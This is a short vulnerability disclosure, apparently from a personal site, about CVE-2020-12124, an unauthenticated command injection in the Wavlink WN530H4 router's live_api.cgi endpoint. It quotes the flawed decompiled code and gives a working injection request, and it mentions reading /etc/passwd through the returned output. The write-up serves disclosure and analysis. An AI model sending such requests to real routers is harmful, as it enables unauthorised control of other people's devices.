cerne.xyz
Home

CVE-2020-12124

This vulnerability is a Command Line Injection in the Wavlink WN530H4 router.

The unauthenticated endpoint, /cgi-bin/live_api.cgi, contains a command line injection vulnerability where unauthenticated users can execute arbitrary Linux shell commands.

The endpoint live_api.cgi accepts three parameters in a GET request: page, id, and ip. The ip parameter contains a command line injection vulnerability. The program does not sanitize the ip parameter and uses the value arbitrarily in a call to the Linux system syscall.

The following code demonstrates the vulnerability, located at address 0x400ac8 in the binary. This code is called if the page parameter is set to satellite_list.


sprintf(linux_command,"echo %s, > /tmp/satellite_list &",ip_var);
do_system(linux_command);

There is another endpoint that is activated when the parameter page is set to any other value. This triggers a similar command line injection, located at address 0x400d24 in the binary.


sprintf(linux_command,"curl -s -m 5 http://%s/mesh_get_extender.shtml",ip_var);
__stream = popen(linux_command,"r");
if (__stream != (FILE *)0x0) {
    while( true ) {
        pcVar2 = fgets(linux_command,0x80,__stream);
        if (pcVar2 == (char *)0x0) break;
        printf("%s",linux_command);
    }
    pclose(__stream);
    ...
}

Armed with this knowledge, an attacker can send a specially crafted web request like the one shown below.


$ curl /cgi-bin/live_api.cgi?page=abc&id=173&ip=;%20touch%20/tmp/hacked;

This command line injection is not blind, and the attacker can inspect the source code of the resulting page to get the command output. For instance, if the command is set to cat /etc/passwd we can see how damaging this vulnerability really is.

Command Line Injection

For more information and vulnerability analysis, please see my report on the WAVLINK WN530H4.